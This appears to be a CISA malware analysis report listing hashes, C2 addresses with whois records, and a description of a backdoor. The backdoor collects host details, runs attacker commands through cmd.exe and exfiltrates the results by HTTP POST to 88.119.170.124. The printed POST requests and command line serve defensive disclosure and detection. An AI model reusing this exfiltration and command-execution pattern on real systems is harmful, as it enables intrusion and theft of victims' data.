MAR-10369127.r1.v1
Malware Characterization
//node() | //@*
This document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.cisa.gov/tlp.
cisa
2022-02-24T10:55:39-05:00
BMachine
38
7.1.0
goopdate.dll
90624
PE32 executable (DLL) (console) Intel 80386, for MS Windows
MD5
a27655d14b0aabec8db70ae08a623317
SHA1
8344f2c1096687ed83c2bbad0e6e549a71b0c0b1
SHA256
12db8bcee090521ecf852bf215ce3878737517a22ef1f2ff9bdec7cba8d0d3aa
SHA512
3c9fa512e7360fecc4db3196e850db8b398d1950a21a3a1f529bbc0a1323cc3b4c8d1bf95acb9ceaa794cf135a56c0e761976f17326594ce08c89117b1700514
SSDEEP
1536:Ggw+CKmmOmwE1k4XGt2EkxtNh7aZgvADsW/cd+32UVGHgz:RCBTDE1krt2Ebg5+32UQHgz
Borland Delphi 3.0 (???)
6.359392
6
2020-09-23 02:02:48-04:00
1024
MD5
dbe1463d7d1b0850df5e47b5320ef5fb
2.757475
.text
54784
6.609888
MD5
c732c8e6ad0cf8292aa60a9da9dcbe7c
.rdata
27648
5.042288
MD5
3bd80fc1bbd1476e125d2e487662e01f
.data
2560
2.366593
MD5
ccd03992b1a52aba460a01a4113d59c8
.rsrc
512
4.712298
MD5
c7a4e8ec050a078d37fff5197af953e2
.reloc
4096
6.411331
MD5
2de65738f49b99cdb71355bdc924c55a
Related_To
Characterized_By
Characterized_By
Figure 1
Figure 2
goopdate.dat
115546
data
MD5
218d4151b39e4ece13d3bf5ff4d1121b
SHA1
28e799d9769bb7e936d1768d498a0d2c7a0d53fb
SHA256
2471a039cb1ddeb826f3a11f89b193624d89052afcbee01205dc92610723eb82
SHA512
8f859945f0c3e590db99bb35f4127f34910268c44f94407e98a5399fec44d92523d07230e793209639914afe61d17dfb41273193e30bbfb950b29ffce3d4b9d5
SSDEEP
3072:bI+Rz2t2VGAQIP2DR7mOOfKI12sKDrS51ODTKjI2:bpF2t2VV2DNmOOyI8s441FjI
7.971267
Related_To
Related_To
Characterized_By
Figure 3
' part of the packet (Figure 6).]]>
config.txt
3364
data
MD5
52299ffc8373f58b62543ec754732e55
SHA1
ca97ac295b2cd57501517c0efd67b6f8a7d1fbdf
SHA256
ce9bd1acf37119ff73b4dff989f2791eb24efc891a413df58856d848f0bcaee9
SHA512
6c9dc3ae0d3090bab57285ac1bc86d0fa60096221c99a383cc1a5a7da1c0614dfdbe4e6fa2aea9ff1e8d3415495d2d444c2f15ad9a1fd3847ddb0fc721f101a2
SSDEEP
48:oN/rGOTDwOQ0rSt4tD9f+1o09KP/iyrjfODVosSh9lwrjhChwsFKDUGymwx:qroOlfBPz5sSh+w9v
5.346853
Related_To
Connected_To
Characterized_By
Characterized_By
Characterized_By
Figure 4
Figure 5
Figure 6
185.183.96.7
Related_To
Related_To
Connected_From
Related_To
443
TCP
185.183.96.7/index.php
Queried whois.ripe.net with "-B 185.183.96.7"...
% Information related to '185.183.96.0 - 185.183.96.255'
% Abuse contact for '185.183.96.0 - 185.183.96.255' is 'abuse@hostsailor.com'
inetnum: 185.183.96.0 - 185.183.96.255
netname: EU-HOSTSAILOR
descr: HostSailor NL Services
country: NL
admin-c: AA31720-RIPE
tech-c: AA31720-RIPE
status: ASSIGNED PA
mnt-by: MNT-HS
created: 2016-12-23T09:52:06Z
last-modified: 2016-12-23T09:52:06Z
source: RIPE
person: Ali Al-Attiyah
address: Suite No: 1605, Churchill Executive Tower, Burf Khalifa Area
address: Dubai P.O. Box 98362
address: United Arab Emirates
phone: +971 455 77 845
nic-hdl: AA31720-RIPE
mnt-by: MNT-HS
created: 2016-12-21T19:19:26Z
last-modified: 2019-03-18T14:07:12Z
source: RIPE
% Information related to '185.183.96.0/24AS60117'
route: 185.183.96.0/24
descr: EU-HOSTSAILOR 185.183.96.0/24
origin: AS60117
mnt-by: MNT-HS
created: 2016-12-23T09:50:04Z
last-modified: 2016-12-23T09:50:04Z
source: RIPE
libpcre2-8-0.dll
96768
PE32 executable (DLL) (console) Intel 80386, for MS Windows
MD5
860f5c2345e8f5c268c9746337ade8b7
SHA1
6c55d3acdc2d8d331f0d13024f736bc28ef5a7e1
SHA256
9d50fcb2c4df4c502db0cac84bef96c2a36d33ef98c454165808ecace4dd2051
SHA512
15b758ada75ae3a6848e3e528e07b19e0efb4156105f0e2ff4486c6df35574c63ccaae5e00d3c4f1ac3f5032f3eb5732179d187979779af4658e8e4dc5020f9f
SSDEEP
1536:TjdtPuB/MpXu7QeqqPKaSc9/Sc+Amru3xobZFsWo/dcd+0Q+MoOl5:TfuBwXuUeqqPIkSc4u3xobb+0Q+MRl5
Borland Delphi 3.0 (???)
6.397339
6
2020-10-05 03:59:42-04:00
1024
MD5
b474b7d68214633e93dc1ab3fcad9a4b
2.769462
.text
55296
6.612472
MD5
d9e1cff126e23d40d396bebc0fe103be
.rdata
33280
5.178997
MD5
8528c24241b97c45d2f90f3ef1baceec
.data
2560
2.380258
MD5
96565e257370e82ea6cc20bdc7831a7b
.rsrc
512
4.717679
MD5
43041985e356ec1bb76514dd6d7a347f
.reloc
4096
6.435504
MD5
6b5a16c382d161788b9cc48d74f91543
vcruntime140.dll
93696
PE32 executable (DLL) (console) Intel 80386, for MS Windows
MD5
cec48bcdedebc962ce45b63e201c0624
SHA1
81f46998c92427032378e5dead48bdfc9128b225
SHA256
dd7ee54b12a55bcc67da4ceaed6e636b7bd30d4db6f6c594e9510e1e605ade92
SHA512
661a59b4cdb4aab652b24cb9b7ca54cdee1d50ac3b0479cb418cf8ec2f7bda15fcc2622e6b08a784187ec3f43acd678d1d73efacd43ac33501963d5e4dfe32e9
SSDEEP
1536:jjevM3civEZfW15lbrWKIAy4pcd8uHxQEbZFsWo/dcdV0yjHe9c0b5i2MUql5:jzcbfO5lbr6Ay4huHxHbbV0eHe9c0b5I
Borland Delphi 3.0 (???)
6.386276
6
2020-10-11 08:50:42-04:00
1024
MD5
644538127a7d5372f16bbc62790e1b5d
2.778786
.text
55808
6.623812
MD5
46d87fd65afee2330ee32fe404fe7657
.rdata
29696
5.111049
MD5
7bc20c2666aeb10cbe1787cdeeb38138
.data
2560
2.380664
MD5
8adf7f42b993b6d8b658ea5a9d554a49
.rsrc
512
4.717679
MD5
065463fcb19d087772450d47229f013f
.reloc
4096
6.466938
MD5
1a870fa886d593f0dd1c9ce8816c3a63
Core.dat
222554
data
MD5
a65696d6b65f7159c9ffcd4119f60195
SHA1
570f7272412ff8257ed6868d90727a459e3b179e
SHA256
b5b1e26312e0574464ddef92c51d5f597e07dba90617c0528ec9f494af7e8504
SHA512
65661ca585e10699eaded4f722914c79b5922e93ea4ca8ecae4a8e3f1320e7b806996f7a54dffbe9d1cdeda593f08e8d95cd831d57de9d9568ea6d8bd280988b
SSDEEP
6144:AD5ss4qHWpWYY3X3YxMNkpMj7vl+AQOjI:Uss4QEWYwYxM+CdZ3
7.990578
Core.dat
222554
data
MD5
4a022ea1fd2bf5e8c0d8b2343a230070
SHA1
89df0feca9a447465d41ac87cb45a6f3c02c574d
SHA256
e7baf353aa12ff2571fc5c45184631dc2692e2f0a61b799e29a1525969bf2d13
SHA512
bec85adf79b916ee64c4a4b6f2cf60d8321d7394a2ec299c3547160f552ecae403c6a2a9aa669cf789d4d99b01c637ac1d0da3c9ed8872bb6184b5ad9543d580
SSDEEP
6144:HzUl+nQWOJ0h0Q+MhozbM8RTVwS9HTkSaRIJjI:HzNQkC06bZuSBTky
7.990584
Dore.dat
208222
PE32 executable (GUI) Intel 80386, for MS Windows
MD5
6c084c8f5a61c6bec5eb5573a2d51ffb
SHA1
61608ed1de56d0e4fe6af07ecba0bd0a69d825b8
SHA256
7e7545d14df7b618b3b1bc24321780c164a0a14d3600dbac0f91afbce1a2f9f4
SHA512
4eaa2d6f29d2712f3487ff7e3a463ec4ba711ba36edda422db126840282e8705ebee6304cc9a54433c7fac7759f98a9543eda881726d8b788f4487b8d4f42423
SSDEEP
6144:LiJOsC/WBmefvpzeChVsg3euJHs7pdcAOlnI:LLWBmyvp/s5uJHs7pdcvI
Microsoft Visual C++ ?.?
6.489815
6
2020-10-11 08:50:37-04:00
1024
MD5
57e428c7f6e8430e0380e9a1681a940c
2.806123
.text
135168
6.614331
MD5
89eb652b81f7b3cd7e9ee9e718575c09
.rdata
58368
5.330927
MD5
4f6c6295c85743cc3a2ca8f5dc2c4648
.data
4096
3.056628
MD5
3fe517cfbe9700ed9c311661377fcbd9
.rsrc
512
4.711341
MD5
7d123d6987b6fa0f191e9ee2fb0d9484
.reloc
8704
6.441951
MD5
320df1e8ed4184af06bb4c62a00cc47b
config.txt
3615
data
MD5
b6b0edf0b31bc95a042e13f3768a65c3
SHA1
5168a8880abe8eb2d28f10787820185fe318859e
SHA256
b6133e04a0a1deb8faf944dd79c46c62f725a72ea9f26dd911d6f6e1e4433f1a
SHA512
669e655ca79c95d8d25e56cb0c4c71574ff74f55e11930e9cdbfb4a3767fce0d09ab362d2f188a153ba25497b8a2508d0501bca342c0558f06e921f603b2218c
SSDEEP
48:oOd/U/82KlaUdrSS1A82RBBboWuP7qgGgmzfBUXX7PXTWPJJ5wx:YmP71+Ju
5.291145
Connected_To
185.117.75.34
Connected_From
Related_To
Related_To
Connected_From
443
TCP
Queried whois.ripe.net with "-B 185.117.75.34"...
% Information related to '185.117.75.0 - 185.117.75.255'
% Abuse contact for '185.117.75.0 - 185.117.75.255' is 'abuse@hostsailor.com'
inetnum: 185.117.75.0 - 185.117.75.255
netname: EU-HOSTSAILOR-20140124
descr: HostSailor NL Services
country: NL
admin-c: AF11712-RIPE
tech-c: AF11712-RIPE
status: ASSIGNED PA
mnt-by: MNT-HS
created: 2016-02-01T08:50:02Z
last-modified: 2016-02-01T08:50:02Z
source: RIPE
person: Host Sailor Ltd - Administrative role account
address: Suite No: 1605, Churchill Executive Tower, Burj Khalifa Area
address: Dubai P.O. Box 98362
address: United Arab Emirates
phone: +97145577845
nic-hdl: AF11712-RIPE
mnt-by: MNT-HS
created: 2014-06-30T16:22:26Z
last-modified: 2019-05-29T09:39:31Z
source: RIPE
Config.txt
5037
ASCII text, with very long lines, with no line terminators
MD5
a0421312705e847a1c8073001fd8499c
SHA1
3204447f54adeffb339ed3e00649ae428544eca3
SHA256
9cb79736302999a7ec4151a43e93cd51c97ede879194cece5e46b4ff471a7af7
SHA512
32c89ce4ec39c0f05fdd578ac7dbd51a882fdca632a00a591655992f258fe1b870c5ac6732d79c835578fd85c237d69d10886b1bec087217b921b8dbd2d7ab50
SSDEEP
96:ND25Bb2G+6C3z+FPyY1PgWuRuSpqq8HRYwC+w7ivocD6ZpY59lmBZ1q0c3:NKnCGO3iFPysIW8YlHRYw5w6F6ZpYUB0
5.941005
192.210.191.188
Connected_From
Related_To
Related_To
443
TCP
Queried whois.arin.net with "n ! NET-192-210-191-0-1"...
NetRange: 192.210.191.0 - 192.210.191.255
CIDR: 192.210.191.0/24
NetName: CC-192-210-191-0-24
NetHandle: NET-192-210-191-0-1
Parent: CC-11 (NET-192-210-128-0-1)
NetType: Reallocated
OriginAS: AS36352
Organization: Virtual Machine Solutions LLC (VMSL-100)
RegDate: 2019-03-26
Updated: 2019-03-26
Ref: https://rdap.arin.net/registry/ip/192.210.191.0
OrgName: Virtual Machine Solutions LLC
OrgId: VMSL-100
Address: 12201 Tukwila International Blvd
City: Seattle
StateProv: WA
PostalCode: 98168
Country: US
RegDate: 2016-06-22
Updated: 2020-12-10
Comment: http://virmach.com/abuse to report abuse.
Ref: https://rdap.arin.net/registry/entity/VMSL-100
OrgTechHandle: GOLES88-ARIN
OrgTechName: Golestani, Amir
OrgTechPhone: +1-800-877-2176
OrgTechEmail: report@virmach.com
OrgTechRef: https://rdap.arin.net/registry/entity/GOLES88-ARIN
OrgAbuseHandle: GOLES88-ARIN
OrgAbuseName: Golestani, Amir
OrgAbusePhone: +1-800-877-2176
OrgAbuseEmail: report@virmach.com
OrgAbuseRef: https://rdap.arin.net/registry/entity/GOLES88-ARIN
Config2.txt
5037
ASCII text, with very long lines, with no line terminators
MD5
a16f4f0c00ca43d5b20f7bc30a3f3559
SHA1
94e26fb2738e49bb70b445315c0d63a5d364c71b
SHA256
5bcdd422089ed96d6711fa251544e2e863b113973db328590cfe0457bfeb564f
SHA512
e1f929029e7382e0a900fb3523dbc175d503b1903b034d88aed3e50aed768ce79c52091520e4a3e40c04e00ab70af3d438de35c79502ff8b11adcb45f6f666bd
SSDEEP
96:ND25Bb2FNushsy1XSWSAIm0Rs1yjLzJ8f3zT+ujYa42g2QR4HElM+ejX+2jIQSgp:NKnCFvsLcIm0bfzAd4F6HEl92pSgoFu
5.935676
Connected_To
AntheHannah_config.txt
3491
data
MD5
51bc53a388fce06487743eadc64c4356
SHA1
b9e6fc51fa3940fb632a68907b8513634d76e5a0
SHA256
9ec8319e278d1b3fa1ccf87b5ce7dd6802dac76881e4e4e16e240c5a98f107e2
SHA512
43d291535b7521a061a24dc0fb1c573d1d011f7afa28e8037dea69eb5ae5bcd69b53a01a636e91827831066f9afc84efc1d556f64dc5cd780f9da79d38783b70
SSDEEP
48:oJX/VlShMEtkDJrSYChZh60cIpoEzMPkQwpCUOfcUeHe0eGeBr8ONIPoUy3pIhwx:uStoJCXhbcIvgPkQw8rfcR+xjBrRUsT
5.319055
TeresitaJordain_config.txt
3580
data
MD5
0ac499496fb48de0727bbef858dadbee
SHA1
483cd5c9dd887367793261730d59178c19fe13f3
SHA256
255e53af8b079c8319ce52583293723551da9affe547da45e2c1d4257cff625a
SHA512
be0d181aabd07b122fcdb79a42ba43ed879a5f0528745447f2c93c6d9cb75c00f1d581520c640fd7f4a61a6f27ef82d99ad09ee2f1cc85340252a7eb7a9fa7a1
SSDEEP
48:oHyk/BbLGAQUJaqQNMWyT1veKRzKykrSaowAQncpQNiqyC2V+mqoS3NwPK+2/t+Q:dyF1p7cKRzDbRBCUDP9X5NbfZJRQURC7
5.296734
Connected_To
185.183.96.44
Related_To
Related_To
Connected_From
443
TCP
Queried whois.ripe.net with "-B 185.183.96.44"...
% Information related to '185.183.96.0 - 185.183.96.255'
% Abuse contact for '185.183.96.0 - 185.183.96.255' is 'abuse@hostsailor.com'
inetnum: 185.183.96.0 - 185.183.96.255
netname: EU-HOSTSAILOR
descr: HostSailor NL Services
country: NL
admin-c: AA31720-RIPE
tech-c: AA31720-RIPE
status: ASSIGNED PA
mnt-by: MNT-HS
created: 2016-12-23T09:52:06Z
last-modified: 2016-12-23T09:52:06Z
source: RIPE
person: Ali Al-Attiyah
address: Suite No: 1605, Churchill Executive Tower, Burf Khalifa Area
address: Dubai P.O. Box 98362
address: United Arab Emirates
phone: +971 455 77 845
nic-hdl: AA31720-RIPE
mnt-by: MNT-HS
created: 2016-12-21T19:19:26Z
last-modified: 2019-03-18T14:07:12Z
source: RIPE
% Information related to '185.183.96.0/24AS60117'
route: 185.183.96.0/24
descr: EU-HOSTSAILOR 185.183.96.0/24
origin: AS60117
mnt-by: MNT-HS
created: 2016-12-23T09:50:04Z
last-modified: 2016-12-23T09:50:04Z
source: RIPE
HeidieLeone.txt
706
ASCII text, with very long lines, with no line terminators
MD5
d68f5417f1d4fc022067bf0313a3867d
SHA1
2f6dd6d11e28bf8b4d7ceec8753d15c7568fb22e
SHA256
e7f6c7b91c482c12fc905b84dbaa9001ef78dc6a771773e1de4b8eade5431eca
SHA512
39023583902e616a196357a69ab31371842f3b6119914803b19e62388dc873ab02567ac398148f84c68adac6228a8cb4e83afb0be24bdf1603a618669030bf39
SSDEEP
12:B6V3vKH/RRNyzV3vowKzV3voDPMV3v7SzV3vHzvm5V3vWQ52LgxxOWpgVEQgjVoL:sV3E/ozV3pKzV3GPMV3OzV3j4V3OQ4sI
5.145602
Connected_To
/
--End GET request--
The JavaScript is launched using the native file “WScript.exe” where the file also creates persistence by copying itself to the user’s Contacts folder and creating a Scheduled Task to relaunch the PowerShell script daily at 10:01. The manifestation function shows the parameters used to build the GET request to 185[.]118[.]164[.]21 and the scheduled task (Figure 7 and Figure 8).
As a persistence mechanism, the manifestation function also copies the file to the User’s Contacts folder, and sets a Scheduled Task to recur daily at 10:01 AM, which would relaunch the PowerShell beacon to 185[.]118[.]164[.]213 (Figure 9).]]>
note.js
3235
ASCII text, with very long lines, with CRLF line terminators
MD5
c0c2cd5cc018e575816c08b36969c4a6
SHA1
47a4e0d466bb20cec5d354e56a9aa3f07cec816a
SHA256
b1e30cce6df16d83b82b751edca57aa17795d8d0cdd960ecee7d90832b0ee76c
SHA512
4b930da1435a72095badaeca729baca8d6af9ab57607e01bd3dd1216eee75c8f8b7981a92640d475d908c6f22811900133aed8ab8513c38f5bc82b60752bf929
SSDEEP
96:/r9/hIgY/5N8s2Q5bQRWs4uQ5WQRWumVxE1Fq:T9/hILLdpG4Rdmwq
5.200319
Characterized_By
Connected_To
Characterized_By
Characterized_By
Characterized_By
Characterized_By
Characterized_By
Figure 7
Figure 8a
Figure 8b
Figure 9
Figure 10a
Figure 10b
185.118.164.21
Related_To
Related_To
Related_To
Connected_From
Connected_From
80
TCP
185.118.164.21/index?param=<computer_name>/<username>
Queried whois.ripe.net with "-B 185.118.164.21"...
% Information related to '185.118.164.0 - 185.118.165.255'
% Abuse contact for '185.118.164.0 - 185.118.165.255' is 'abuse@profitserver.ru'
inetnum: 185.118.164.0 - 185.118.165.255
netname: RU-CHELYABINSK-SIGNAL-20150923
country: RU
admin-c: AN29881-RIPE
tech-c: AN29881-RIPE
status: ASSIGNED PA
mnt-by: ru-chelyabinsk-signal-1-mnt
created: 2016-10-12T10:22:21Z
last-modified: 2016-10-12T10:22:21Z
source: RIPE
person: Alexey Nevolin
address: Ordzhonikidze str., 54-B
address: 454091
address: Chelyabinsk
address: RUSSIAN FEDERATION
phone: +7 3517299971
nic-hdl: AN29881-RIPE
mnt-by: ru-chelyabinsk-signal-1-mnt
created: 2015-09-18T15:23:57Z
last-modified: 2015-09-18T15:23:58Z
source: RIPE
% Information related to '185.118.164.0/24AS44493'
route: 185.118.164.0/24
descr: Chelyabinsk-Signal
origin: AS44493
mnt-by: ru-chelyabinsk-signal-1-mnt
created: 2015-11-17T05:53:42Z
last-modified: 2015-11-17T05:53:42Z
source: RIPE
/
--End GET Request--
This file performs the same tasks as "note.js" (b1e30cce6df16d83b82b751edca57aa17795d8d0cdd960ecee7d90832b0ee76c) and is launched using the native file “WScript.exe” where the rj.js gains persistence by copying itself to the user’s Contacts folder and creating a Scheduled Task to relaunch the PowerShell script daily at 10:01 AM.]]>
rj.js
5257
ASCII text, with very long lines
MD5
37fa9e6b9be7242984a39a024cade2d5
SHA1
0211569091b96cffab6918e18ccc97f4b24d88d4
SHA256
42ca7d3fcd6d220cd380f34f9aa728b3bb68908b49f04d04f685631ee1f78986
SHA512
889f293af25aa3af14c580000f15ade58e5b6b6000f42ddf38b69fd74a663b4c92cc2a90bfc9804d9de194e1eeee734f0b9e0ea5838afbc09f6fa3bfb3f5891c
SSDEEP
96:ub0werybmdzpcY3EUCGYZoTuEDdEyh8G2ng7qci1yMA1h5+N:ub09ymdzpcY3BOZIDmyh8G2ntci1P856
5.422642
Connected_To
FML.dll
210397496
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
MD5
0431445d6d6e5802c207c8bc6a6402ea
SHA1
3765c1ad8a1d936aad88255aef5d6d4ce24f94e8
SHA256
3098dd53da40947a82e59265a47059e69b2925bc49c679e6555d102d1c6cbbc8
SHA512
f46d71a66aa615efdcec37ff282201695f6216a8903a83edee874ced321b8a090baf1054e77bd3ed642e5da60522ea245e1741726fc4b49ccbef11203f5790bf
SSDEEP
3145728:LFiQ9FiQ9FiQ9FiQ9FiQ9FiQ9FiQ9FiQ9FiQ9FiQ9FiQ9FiQ9FiY:AQyQyQyQyQyQyQyQyQyQyQyQyY
7.999913
8
2020-01-20 09:19:24-05:00
1024
MD5
fea26576aaf64f90e067892d07fb8f97
3.335479
.text
468992
6.42081
MD5
11cc597cf11ee87c3a0f76dcecf7556a
.rdata
167936
4.843554
MD5
52f5c458bae1ec48fc650d0975663910
.data
11264
4.040157
MD5
f7a88a7f326a63079052f1884b57e3a8
.pdata
25088
5.777552
MD5
c2b5de9421b4a0c9b7d4688f4ae051ac
.tls
512
0.020393
MD5
1f354d76203061bfdd5a53dae48d5435
.rsrc
209716224
8.0
MD5
37b679e67208f1af8eed89301450017a
.reloc
5120
5.322063
MD5
ef43c49686a0f7100f95a3dfa50d84ea
Characterized_By
Characterized_By
Characterized_By
Characterized_By
Figure 11
Figure 12
Figure 13
Figure 14
Cooperation terms.xls
252928
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: pc, Last Saved By: interstellar, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Sep 29 20:38:56 2021, Last Saved Time/Date: Mon Oct 4 07:32:17 2021, Security: 0
MD5
b0ab12a5a4c232c902cdeba421872c37
SHA1
a8e7659942cc19f422678181ee23297efa55fa09
SHA256
026868713d60e6790f41dc7046deb4e6795825faa903113d2f22b644f0d21141
SHA512
c1ff4c3bd44e66e45cdb66b818a963d641cde6b9ea33ac64374929f182cd09e944d9337a588ba99d3df98190ba979431d015d848aa09c2d93763a1ed795ff304
SSDEEP
6144:Lk3hOdsylKlgryzc4bNhZF+E+W2knAcYi4uU4pVZ8lx+tSeJBWC:5iLZpVZ8lx+tn3WC
7.16796
Dropped
Dropped
Characterized_By
Characterized_By
Figure 15
Figure 16
Outlook.wsf
11692
HTML document, Little-endian UTF-16 Unicode text, with CRLF line terminators
MD5
e182a861616a9f12bc79988e6a4186af
SHA1
69840d4c4755cdab01527eacbb48577d973f7157
SHA256
c2badcdfa9b7ece00f245990bb85fb6645c05b155b77deaf2bb7a2a0aacbe49e
SHA512
0eb88fe297d296569063874bead48c8b2998edc6779f5777f533de241fa49d7cb4aadc189bcdd07783ad2d669ac35344b2385c62859bc5b0c6fbe55e4857002b
SSDEEP
192:qK8Lkrc2HWT1jbAaBLGFNN68RNEFQQrrl+lBAlJlgQGtb0UqQYGQrQoGuQgQXPY5:qK82ZWTd/LYNBRNEFl+l2lJlGdPUlcKp
4.062618
Dropped_By
Characterized_By
Figure 17
> %temp%\\h.txt
Select * from Win32_IP4RouteTable
"%COMPUTERNAME%"
"%USERNAME%"
--End strings--
It collects the victim's system IP address, computer name, and username in the format below:
--Begin information--
Format: [victim's system Internet Protocol address]|#@*@#|[Computer name]/Username
Sample: "19x.1xx.2xx.2xx|#@*@#|WIN-HVMLL1IR74C/user01"
--End information--
The collected data above is hex-encoded, and the hex bytes are reshuffled and appended to a string "vl" before exfiltration. It will send the encoded data using the Uniform Resource Identifier (URI): "http[:]//88[.]119[.]170[.]124/ezedcjrfvjriftmldedu" and wait for a response.
Displayed below is the POST request used to exfiltrate the victim's system data:
--Begin request--
POST /ezedcjrfvjriftmldedu HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
CharSet: UTF-8
Content-Length: 93
Host: 88[.]119[.]170[.]124
vl=1693273632E6349334E37235340D743442D53463ED34C7CC2214A90423C5494228E4F7032293856253E6216713
--End request---
The response payload was not available for analysis. Analysis indicates that the C2 response payloads are hex encoded and reshuffled. It uses the same built-in algorithm to arrange and hex decode these payloads, which contain command-line scripts. The malware will search for the string "|#@*@#|" or "/!*##*!/" in the decoded payload. If the payload contains one of these strings, it will parse the command-line scripts for execution using the command below:
--Begin command--
"cmd.exe /c [decoded command scripts]| >> %temp%\\h.txt"
--End command--
The output of the command-line scripts executed is stored into a text file "%temp%\h.txt". It reads the output of the command executed from the text file "%temp%\h.txt" and attaches it to the victim's system IP address, computer name, and username in the format below:
--Begin format--
Format: "[victim's system Internet Protocol address]|#@*@#|[Computer name]/Username|#@*@#|[Output of the command executed]"
Sample observed: "19x.1xx.2xx.2xx|#@*@#|WIN-HVMLL1IR74C/user01|#@*@#|\r\nWindows IP Configuration\r\n\r\n\r\nEthernet adapter Local Area Connection 2:\r\n\r\n Connection-specific DNS Suffix . : \r\n Link-local IPv6 Address . . . . . : fe80::d1d7:d838:2959:23d0%15\r\n IPv4 Address. . . . . . . . . . . : 19x.1xx.2xx.1xx\r\n Subnet Mask . . . . . . . . . . . : 255.255.255.0\r\n Default Gateway . . . . . . . . . : 19x.1xx.2xx.2xx\r\n\r\nEthernet adapter Local Area Connection:\r\n\r\n Media State . . . . . . . . . . . : Media disconnected\r\n Connection-specific DNS Suffix . : \r\n\r\nTunnel adapter isatap.{62D6C817-FD7E-4634-83CF-3311F44F4490}:\r\n\r\n Media State . . . . . . . . . . . : Media disconnected\r\n Connection-specific DNS Suffix . : \r\n\r\nTunnel adapter Teredo Tunneling Pseudo-Interface:\r\n\r\n Connection-specific DNS Suffix . : \r\n IPv6 Address. . . . . . . . . . . : 2001:0:c000:27b:c2f:3a2f:3f57:2e63\r\n Link-local IPv6 Address . . . . . : fe80::c2f:3a2f:3f57:2e63%12\r\n Default Gateway . . . . . . . . . : ::\r\n\r\nTunnel adapter isatap.{43E8EDE4-433A-453E-B583-1A994D8B33E2}:\r\n\r\n Media State . . . . . . . . . . . : Media disconnected\r\n Connection-specific DNS Suffix . : \r\n"
--End format--
The above victim's system's information and the output command data are hex-encoded, and the hex bytes are re-ordered and appended to a string "vl" before exfiltration. It will send the encoded data using the URI: "http[:]//88[.]119[.]170[.]124/lcekcnkxkbllmwlpoklgof" and wait for a response (next command).
Displayed below is the POST request used to exfiltrate the victim's system data and the output of the command executed:
--Begin request--
POST /lcekcnkxkbllmwlpoklgof HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
CharSet: UTF-8
Content-Length: 9813
Host: 88[.]119[.]170[.]124
vl=[re-ordered hex-encoded victim's system data and the output of the command executed]
--End request---
Displayed below is sample POST request that contains the encoded victim's system data and the output of the command executed:
--Begin request--
POST /lcekcnkxkbllmwlpoklgof HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
CharSet: UTF-8
Content-Length: 5689
Host: 88[.]119[.]170[.]124
vl=A093273633E2339332927232320A723242D6E6D346365E7226F466E77467273E265674D6469267477C024204601063744215623203A2E202224279426216621227E262052222240296E426262......F0E20702E4A2D2E2DAE2E29240A22252E99265D2F0320602900234705142E5F477A2F2C63066A2027EC2122220524492D8F230420F2397E6CEC225648F56E59600C63706AE0604C4410625E607022202856253E521D013
--End request---
It is designed to send these messages below to the C2 server using the URI: "http[:]//88[.]119[.]170[.]124/lcekcnkxkbllmwlpoklgof". Each message sent is hex-encoded, and the hex bytes are re-ordered and appended to a string "vl":
--Begin message format--
"200/!*##*!/19x.1xx.2xx.2xx|#@*@#|WIN-HVMLL1IR74C/user01" ==> When the decoded C2 command data received contains the string "|#@*@#|" or "/!*##*!/".
"19x.1xx.2xx.2xx|#@*@#|WIN-HVMLL1IR74C/user01|#@*@#|sory" ==> When a command or a specific task fails
--End message format--]]>
Outlook.wsf
34242
HTML document, Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
MD5
b3504546810e78304e879df76d4eec46
SHA1
d02d93b707ac999fde0545792870a2b82dc3a238
SHA256
f10471e15c6b971092377c524a0622edf4525acee42f4b61e732f342ea7c0df0
SHA512
d7a78259988e17b1487a3cc2a3a8ba7aaa1cae8904b2ee3da79a6a77266822f726a367cda9c1b59aab3cf369ebf5bec1f279e8e6ff036376073f8a20e3053576
SSDEEP
384:NaeE4zZlbO1/RW8upzK2Hkq3+LBOuCBSnUosLCFt9tMRYCnFCg+tJCXw2V3:NaeEpu9VEU+LQEsMt9tUl+ta
3.699753
Dropped_By
Connected_To
Characterized_By
Figure 18
88.119.170.124
Related_To
Related_To
Related_To
Connected_From
Domain Name: bacloud.info
Registry Domain ID: 9ae51aee8f3144059e17d8f8fba3095e-DONUTS
Registrar WHOIS Server: whois.PublicDomainRegistry.com
Registrar URL: http://www.PublicDomainRegistry.com
Updated Date: 2021-03-09T06:39:04Z
Creation Date: 2010-04-22T12:46:58Z
Registry Expiry Date: 2022-04-22T12:46:58Z
Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com
Registrar IANA ID: 303
Registrar Abuse Contact Email: abuse@publicdomainregistry.com
Registrar Abuse Contact Phone: +91.2230797500
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: GDPR Masked
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: GDPR Masked
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: US
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext: REDACTED FOR PRIVACY
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext: REDACTED FOR PRIVACY
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
